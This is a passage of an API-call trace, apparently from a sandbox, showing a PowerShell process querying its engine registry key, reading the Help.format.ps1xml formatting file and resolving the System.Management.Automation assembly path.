	[0543.356] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0543.356] CoTaskMemFree (pv=0x3f9870) 
	[0543.356] RegCloseKey (hKey=0x324) returned 0x0
	[0543.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.357] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x4be4749a, Data2=0x258e, Data3=0x41f2, Data4=([0]=0xaf, [1]=0xa1, [2]=0x86, [3]=0x9f, [4]=0xb, [5]=0xd3, [6]=0x36, [7]=0x94))) returned 0x0
	[0543.357] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf6f8a96, Data2=0x6020, Data3=0x49eb, Data4=([0]=0xb7, [1]=0xff, [2]=0x54, [3]=0x39, [4]=0xc2, [5]=0xf, [6]=0x13, [7]=0xc2))) returned 0x0
	[0543.357] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1a27164d, Data2=0xab62, Data3=0x4056, Data4=([0]=0xa3, [1]=0xca, [2]=0x4d, [3]=0xe2, [4]=0x36, [5]=0xd1, [6]=0x78, [7]=0x40))) returned 0x0
	[0543.357] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xda8127eb, Data2=0x141, Data3=0x4cb9, Data4=([0]=0x91, [1]=0x68, [2]=0xb2, [3]=0xfd, [4]=0xa9, [5]=0x8a, [6]=0x14, [7]=0x7c))) returned 0x0
	[0543.358] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0543.358] GetFileType (hFile=0x324) returned 0x1
	[0543.358] SetErrorMode (uMode=0x1) returned 0x1
	[0543.358] GetFileType (hFile=0x324) returned 0x1
	[0543.358] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.359] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.359] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.359] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.360] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.360] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.360] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.360] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.361] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.362] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.362] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.362] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.363] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.363] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.363] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.364] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.366] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.366] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.367] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.367] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.367] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.368] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.368] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.368] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.368] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.369] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.369] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.369] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.370] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.370] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.370] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.371] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.378] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.378] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.378] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.379] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.379] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.379] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.380] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.380] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.380] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.380] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.381] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.381] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.381] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.381] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.382] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.382] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.267] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.267] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.267] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.267] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.268] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.268] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.268] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.268] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.269] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.269] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.269] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.269] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.270] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.270] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.270] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0xf37, lpOverlapped=0x0) returned 1
	[0544.270] ReadFile (in: hFile=0x324, lpBuffer=0x2d56b97, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d56b97*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0544.270] ReadFile (in: hFile=0x324, lpBuffer=0x2d574f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2d574f8*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0544.271] CloseHandle (hObject=0x324) returned 1
	[0544.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.271] SetErrorMode (uMode=0x1) returned 0x1
	[0544.271] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0544.271] SetErrorMode (uMode=0x1) returned 0x1
	[0544.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0544.272] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0544.272] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
	[0544.272] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0544.272] CoTaskMemFree (pv=0x3f9870) 
	[0544.272] RegCloseKey (hKey=0x324) returned 0x0
	[0544.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.283] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x52cd0bc0, Data2=0x8d17, Data3=0x4b40, Data4=([0]=0x98, [1]=0x5b, [2]=0x51, [3]=0xf7, [4]=0xd9, [5]=0x41, [6]=0x9e, [7]=0xab))) returned 0x0
	[0544.283] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x12937afa, Data2=0x73d0, Data3=0x4331, Data4=([0]=0xb5, [1]=0x9e, [2]=0x3c, [3]=0x4a, [4]=0x55, [5]=0x8e, [6]=0x67, [7]=0xb7))) returned 0x0
	[0544.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0544.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
